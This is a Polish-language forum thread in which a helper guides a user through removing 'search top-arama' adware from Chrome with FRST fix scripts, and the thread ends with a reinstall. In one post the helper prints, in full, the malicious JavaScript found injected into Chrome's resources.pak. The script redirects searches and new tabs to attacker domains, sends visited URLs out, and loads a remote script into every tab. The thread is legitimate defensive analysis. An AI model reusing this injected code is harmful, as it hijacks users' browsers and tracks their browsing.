Uzda Opublikowano 18 Października 2015 Zgłoś Udostępnij Opublikowano 18 Października 2015 Witam, Chrome został zarażony "search top-arama" Uruchamia się jako strona startowa, towarzyszy jej otwieranie się samoczynnie reklam typu zakłady bukmacherskie czy kasyna Dodatkowo samoczynnie otwierają się strony internetowe niewiadomego pochodzenia. 1. Próbowałem (jak mówił wujek Google) zminiać stronę startową i wyszukiwarkę w opcjach chroma i nic 2. Resetowałem ustawienia Chroma - nic 3. AdwCleaner - coś tam poiusuwał, ale tego nie dał rady 4. MalwaresBytes - Anti_Malware - to samo 5. CCcleaner - to samo 6. AntiMalware od Emisoftu to samo. Proszę więc pomoc. Z góry dziękuję... Pozdrawaim Za chwilę dołączę GMERa FRST.txt Addition.txt Shortcut.txt Odnośnik do komentarza
picasso Opublikowano 18 Października 2015 Zgłoś Udostępnij Opublikowano 18 Października 2015 Widzę w raporcie polityki blokujące jakieś funkcje w Google Chrome. Przy okazji: Opera też jest zainfekowana. Akcje wstępne: 1. Odinstaluj stare wersje: Adobe Reader X (10.1.16) MUI , Adobe Shockwave Player 11.5, Java 8 Update 51. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CMD: type C:\Windows\system32\GroupPolicy\Machine\registry.pol GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia CHR RestoreOnStartup: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFeV8MB1xJFRgQcQxaTA0URwIOeFwAURQXRAMaeQpbAF9CEwcFIk0FA1oDB0VXfV5bFElXTwhlKVVMBEsjREZWLE1L" OPR Session Restore: -> [funkcja włączona] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?trackid=sp-006 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-4026836190-3788267660-437267313-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} HKU\S-1-5-21-4026836190-3788267660-437267313-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxps://www.google.com/?trackid=sp-006 SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} SearchScopes: HKU\S-1-5-21-4026836190-3788267660-437267313-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-4026836190-3788267660-437267313-1000 -> OldSearch URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} BHO: Brak nazwy -> {4F524A2D-5354-2D53-5045-7A786E7484D7} -> Brak pliku BHO-x32: Brak nazwy -> {4F524A2D-5354-2D53-5045-7A786E7484D7} -> Brak pliku Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - Brak pliku HKLM-x32\...\Run: [] => [X] ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Brak pliku FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [brak pliku] C:\ProgramData\AVAST Software C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data C:\Users\Admin\Downloads\*_www.INSTALKI.pl.exe C:\Users\Admin\Downloads\Niepotwierdzony*.crdownload EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść przeglądarki: Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Opera: Menu > Ustawienia > Otwórz wybraną stronę lub zestaw stron > wymaż searchinterneat-a.akamaihd.net 4. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 5. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy problemy nadal występują. Odnośnik do komentarza
Uzda Opublikowano 18 Października 2015 Autor Zgłoś Udostępnij Opublikowano 18 Października 2015 Przy pierwszym uruchomieniu Chrome po wykonaniu fixa (musiałem to zrobić, żeby zresetować przyglądarkę) było wszystko ok. Niestety przy drugim uruchomieniu pojawił się ten sam problem. Identyczne zachowanie jak wcześniej. Zrobiłem wszystko zgodnie z instrukcją tyle tylko że Operę wywaliłem w cholerę Poniżej nowy log i proszę o wsparcie FRST2.txt Fixlog.txt Odnośnik do komentarza
picasso Opublikowano 18 Października 2015 Zgłoś Udostępnij Opublikowano 18 Października 2015 Skoro problem wraca mimo usunięcia polityk, to tu chyba jest zmodyfikowany któryś plik Google Chrome. Dostarcz mi dane do ręcznej analizy. Skopiuj na Pulpit poniższe foldery, spakuj do ZIP, shostuj gdzieś i podlinkuj paczkę. C:\Program Files (x86)\Google\Chrome C:\Users\Admin\AppData\Local\Google Odnośnik do komentarza
Uzda Opublikowano 18 Października 2015 Autor Zgłoś Udostępnij Opublikowano 18 Października 2015 Link: http://przeklej.org/file/DbZapJ/Chrome.zip Odnośnik do komentarza
picasso Opublikowano 19 Października 2015 Zgłoś Udostępnij Opublikowano 19 Października 2015 Jest zainfekowany globalny plik zasobów resources.pak, czyli adware jest obecnie trwale zintegrowane z przeglądarką. W folderze Google korespondującym do bieżącej wersji Chrome są dwie instancje plików zasobów, plik *.bak wygląda na kopię zapasową poprawnego pliku zrobioną przez adware: C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.101\resources.bak [16 349 KB 2015.09.24] C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.101\resources.pak [16 355 KB 2015.10.10] [to samo występuje w folderze starej wersji: 45.0.2454.99] Te pliki odróżnia obecność następującego skryptu: resources.pak <!-- Copyright 2013 The Chromium Authors. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. We use an HTML page just to have access to the DOM, for URL parsing. An alternative would be to include a URL parsing JavaScript library with the extension but this approach is likely smaller and faster. --> <html> <head> <script src="thunk.js"></script> </head> <body> </body> </html> try{(function(d,u){function k(a){for(var b=0;b<a.length;b++){var e=b,c;c=a[b];if("string"===typeof c)a:{if(!v(c))for(var g=0;g<p.length;g++)if(p[g].test(c)){c="";break a}}else c=c.toString();c=encodeURIComponent(c.replace(w,"$cma;"));a[e]=c}(new Image).src="https://filterresults-a.akamaihd.net/stats/?"+a.shift()+"="+a.join("|,|")}function m(a){return[ ".*volunteercentre.org.*",".*search.yahoo.com.*_bd_com.*",".*capn=ed_ui_.*_kw_001.*",".*ask.com.*siteid=28527.*",".*src=55cd729e57e760c05c8b466e.*",".*capn=ed_ui_jp_kw_002.*",".*thesmartsearch.net.*",".*search.results-hub.com.*",".*search.netbetterresults.com.*",".*fluey.com.*",".*home.searchpile.com.*",".*au.ask.com.*28527.*",".*uk.ask.com.*32859.*",".*thesmartsearch.net.*p=ein.*",".*capn=ed_ui_.*_kw_004.*",".*search.top-arama.com.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/s.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/h.*",".*=__default.*"].some(function({return(new RegExp().test(a)})}function x(a,{var e=queryCommandValue;h(function(c){c||(c={});var g=c["BL_ST_"+a+"_"+e],d=Date.now();g?3E3>d-g?b&&b(!0):(c["BL_ST_"+a+"_"+e]=d,b&&b(!1),f(c)):(c["BL_ST_"+a+"_"+e]=d,f(c),b&&b(!1))})}function h(a){chrome.storage.local.get("BLGC_STORAGE",function({a&&a(b.BLGC_STORAGE)})}function f(a){var b={};b.BLGC_STORAGE=a;chrome.storage.local.set(b,function(){})}function q(a){try{if(0==a.length)return{hostName:""};var b=u.createElement("a");0!=a.indexOf("http")&&(a="http://"+a);b.href=a;return b}catch(e){}return{hostname:a}}function y(a){a=a.toLowerCase();for(var b=0;b<n.length;b++)if(-1!=a.indexOf(n[b].host.toLowerCase()))return b;return-1}function l(a,{try{b=b.replace(/[\[]/,"\[").replace(/[\]]/,"\]");var e=(new RegExp("[\?]"+b+"=([^]*)")).exec(a);return null==e?null:e[1]}catch(c){}}function z(a,{var e=l(a,n[b].oparam);switch({case 0:case 2:case 3:case 4:return!!e;case 1:var e=l(a,"type"),c=l(a,"hsimp"),g=l(a,"fr"),d=/^http(s)?:\/\/(.{2}\.)?(malaysia\.)?(y.*\.)?search\.yahoo\./;return!!g&&-1!=g.indexOf("ddc-bd")||!!c&&-1!=c.indexOf("ddc_bd")||!!e&&-1!=e.indexOf("_bd_com")||!d.test(a)||-1!=a.indexOf("/local/")}return!1}function r(a,{var e=-1,c="",g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8BBw0XRA0XbQoJVFtcFVBFdxQABAFBDFNGdgABUloQRwYRch9aFQQTQkcFME0FA1UWQhNNfX9RDU0UU2dGM0xUFUo=&q=|search_term|",d=null,f=null;b.url&&!m(b.url)&&(f=q(b.url).hostname,h(function(h){h||(h={});if(-1!=(e=y(f))){if(h[a]&&(d=q(h[a]).hostname,(!f||f==d)&&1!=e))return;c=n[e].param;!z(b.url,e)&&(queryCommandValue=l(b.url,c))&&x(a,function(c){c?k(["BL_YS_Action_2","FilterResults","f9f4fe84-315b-4ef7-8e80-fe6993caf322","blgc","SkippedSearch",b.url]):(g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8BBw0XRA0XbQoJVFtcFVBFdxQABAFBDFNGdgABUloQRwYRch9aFQQTQkcFME0FA1UWQhNNfX9RDU0UU2dGM0xUFUo=&q=|search_term|".replace("|search_term|",queryCommandValue),chrome.tabs.update(a,{url:g}),k(["BL_YS_Action_2","FilterResults","f9f4fe84-315b-4ef7-8e80-fe6993caf322","blgc","Search",b.url]))})}}))}function A(a,b,e){try{chrome.tabs.executeScript(a,{code:"if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://filterresults-a.akamaihd.net/FilterResults/cr?t=BLGC&g=f9f4fe84-315b-4ef7-8e80-fe6993caf322&pn=Chrome'; document.head.appendChild(scr);}"})}catch(c){}-1!=t.indexOf(b.url)&&(m(e.url)||chrome.tabs.update(a,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHFMaJg1eBAFFDAYSdVsVVVwXFhgbJQEITF8UFwwac1pZBwpDExNBNARaAktXUUEeIlVfAh8fHHNKLE1dE2sUUkBPNEo="}),h(function(c){c||(c={});c[a]=b.url;f(c)}),d.skipNewTabMsg?d.skipNewTabMsg=!1:k(["BL_YS_Action_2","FilterResults","f9f4fe84-315b-4ef7-8e80-fe6993caf322","blgc","NewTab",b.url]));d.firstRun=!1;r(a,;b.url&&h(function(c){c||(c={});c[a]=b.url;f(c)})}"undefined"==typeof d.firstRun&&(d.firstRun=!1);"undefined"==typeof d.skipNewTabMsg&&(d.skipNewTabMsg=!1);var t=["chrome://newtab/","safer://newtab/"],n=[{host:".bing.",param:"q",oparam:"qs"},{host:"search.yahoo.",param:"p",oparam:"fr"},{host:".google.",param:"q",oparam:"site"},{host:".ask.",param:"q",oparam:"qo"},{host:"search.aol.",param:"q",oparam:"s_it"},{host:"go.mail.ru",param:"q",oparam:"NA"},{host:"intent.clara-labs.",param:"q",oparam:"NA"},{host:"trovi.",param:"q",oparam:"NA"},{host:".plusnetwork.",param:"q",oparam:"NA"},{host:"isearch.bobrowser.",param:"q",oparam:"NA"},{host:"www-searching.",param:"q",oparam:"NA"},{host:".thesmartsearch.",param:"q",oparam:"NA"},{host:".search.safer.",param:"q",oparam:"NA"},{host:".cassiopessa.",param:"q",oparam:"NA"}],p=[/(?:\d[(). -]*?){9,16}/,/[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/i],w=/,/g;btoa("94df1405-b2c7-479e-98ea-4be1fc81ab76_54_10");var v=function(){var a=/^[\d,a-f]{8}-(?:[\d,a-f]{4}-){3}[\d,a-f]{12}$/i;return function({return a.test(}}();chrome.runtime.onStartup.addListener(function(){d.firstRun=!0;d.skipNewTabMsg=!0;f({})});chrome.tabs.onReplaced.addListener(function(a,{var e,c;h(function(d){d||(d={});e=d[a];c=d[b];d[a]=c;d[b]=e;f(d)})});chrome.tabs.onRemoved.addListener(function(a){h(function({b||(b={});delete b[a];f(})});chrome.tabs.onCreated.addListener(function(a){if(a.id&&!a.openerTabId)if(d.firstRun){if(m(a.url))return;chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFeV8MB1xJFRgQcQxaTA0URwIOeFwAURQXRAMaeQpbAF9CEwcFIk0FA1oDB0VXfVtUBlpXTwhlKVVMBEsjREZWLE1L"});k(["BL_YS_Action_2","FilterResults","f9f4fe84-315b-4ef7-8e80-fe6993caf322","blgc","HomePage",a.url])}else-1==t.indexOf(a.url)||m(a.url)||(chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHFMaJg1eBAFFDAYSdVsVVVwXFhgbJQEITF8UFwwac1pZBwpDExNBNARaAktXUUEeIlVfAh8fHHNKLE1dE2sUUkBPNEo="}),k(["BL_YS_Action_2","FilterResults","f9f4fe84-315b-4ef7-8e80-fe6993caf322","blgc","NewTab",a.url]));else a.openerTabId&&h(function({b||(b={});b[a.id]=b[a.openerTabId];f(});d.firstRun=!1});chrome.webNavigation.onBeforeNavigate.addListener(function(a){0===a.frameId&&r(a.tabId,{url:a.url})});chrome.tabs.onUpdated.addListener(function(a,b,d){A(a,b,d)})})(window,document)}catch(d){};// Copyright 2013 The Chromium Authors. All rights reserved. // resources.bak <!-- Copyright 2013 The Chromium Authors. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. We use an HTML page just to have access to the DOM, for URL parsing. An alternative would be to include a URL parsing JavaScript library with the extension but this approach is likely smaller and faster. --> <html> <head> <script src="thunk.js"></script> </head> <body> </body> </html> // Copyright 2013 The Chromium Authors. All rights reserved. // W sytuacji bezpośredniej integracji adware z zasobami jest konieczna reinstalacja Google Chrome. Aczkolwiek jest plik BAK, który zdaje się być poprawny. Przeprowadź test, czy da się to rozwiązać przez zwykłą podmianę pliku: 1. Zamknij Google Chrome. Wejdź do folderu C:\Program Files (x86)\Google\Chrome\Application. Upewnij się jaka jest najwyższa wersja, czy nadal jest to 45.0.2454.101, bo w międzyczasie Chrome mogło się zaktualizować już do 46.0.2490.71. W folderze najwyższej wersji skasuj plik resources.pak, a plikowi resouces.bak zmień nazwę na resouces.pak. Foldery starszych wersji w całości przez SHIFT+DEL (omija Kosz) skasuj. 2. Uruchom przeglądarkę, zresetuj jej ustawienia ponownie i powiedz czy reklamy nadal występują. Odnośnik do komentarza
Uzda Opublikowano 19 Października 2015 Autor Zgłoś Udostępnij Opublikowano 19 Października 2015 Melduję, że skasowałem folder starszej wersji oraz resources.pak, natomiast resouces.bak (czy tez resources.bak nie ma) Zaraz zresetuję ustawienia dam znać co i jak EDIT: Aplikacja nie uruchamia się, tzn. Włącza się fizycznie ale wywala błąd "Google Chrome przestał działać" i zamyka aplikację. może spróbuję odinstalować i zainstalować ponownie? Odnośnik do komentarza
picasso Opublikowano 19 Października 2015 Zgłoś Udostępnij Opublikowano 19 Października 2015 Plik resources.bak (nie resource.bak) był wcześniej, gdyż mam to w paczce którą mi wysłałeś. Czy na pewno szukałeś w odpowiednim folderze i masz włączone pokazywanie rozszerzeń plików? Skoro teraz go nie ma, to może adware usunęło. Oczywiście resources.pak nie może być skasowany bez podstawienia jego wcześniejszej czystej wersji! To jest plik zasobów niezbędny do obsługi Google Chrome i przeglądarka w ogóle bez niego nie działa. Mogłabym przesłać Ci kopię którą mi wysłałeś, ale jest już nowsza wersja przeglądarki i w tej sytuacji lepiej wszystko przeładować od zera: 1. Zakładam, że synchronizację wyłączyłeś wcześniej. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Na razie nie instaluj nowej wersji. 2. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Odnośnik do komentarza
Uzda Opublikowano 19 Października 2015 Autor Zgłoś Udostępnij Opublikowano 19 Października 2015 Synchronizację wyłączyłem - przystępuję do działania odezwe się jak skończę Plik w załączniku FRST.txt Odnośnik do komentarza
picasso Opublikowano 21 Października 2015 Zgłoś Udostępnij Opublikowano 21 Października 2015 1. Drobne poprawki. Otwórz Notatnik i wklej w nim: Toolbar: HKU\S-1-5-21-4026836190-3788267660-437267313-1000 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Brak pliku HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe" C:\Program Files (x86)\Opera C:\Users\Admin\AppData\Local\Opera Software C:\Users\Admin\AppData\Roaming\Opera Software Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions /f Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Powstanie kolejny fixlog.txt. 2. Zainstaluj najnowszą wersję Google Chrome. 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
Uzda Opublikowano 21 Października 2015 Autor Zgłoś Udostępnij Opublikowano 21 Października 2015 Hej, Wykonałem wszystko zgodnie z instrukcją. poniżej logi. czekam na (mam nadzieję) finalną opinię FRST.txt Fixlog.txt Odnośnik do komentarza
picasso Opublikowano 21 Października 2015 Zgłoś Udostępnij Opublikowano 21 Października 2015 Wszystko wygląda dobrze. Google Chrome było kompletnie reinstalowane, więc problem z adware powinien zniknąć na dobre. Na koniec: Zastosuj DelFix, by skasować używane narzędzia. GMER dokasuj ręcznie, DelFix go nie wykryje. Odnośnik do komentarza
Rekomendowane odpowiedzi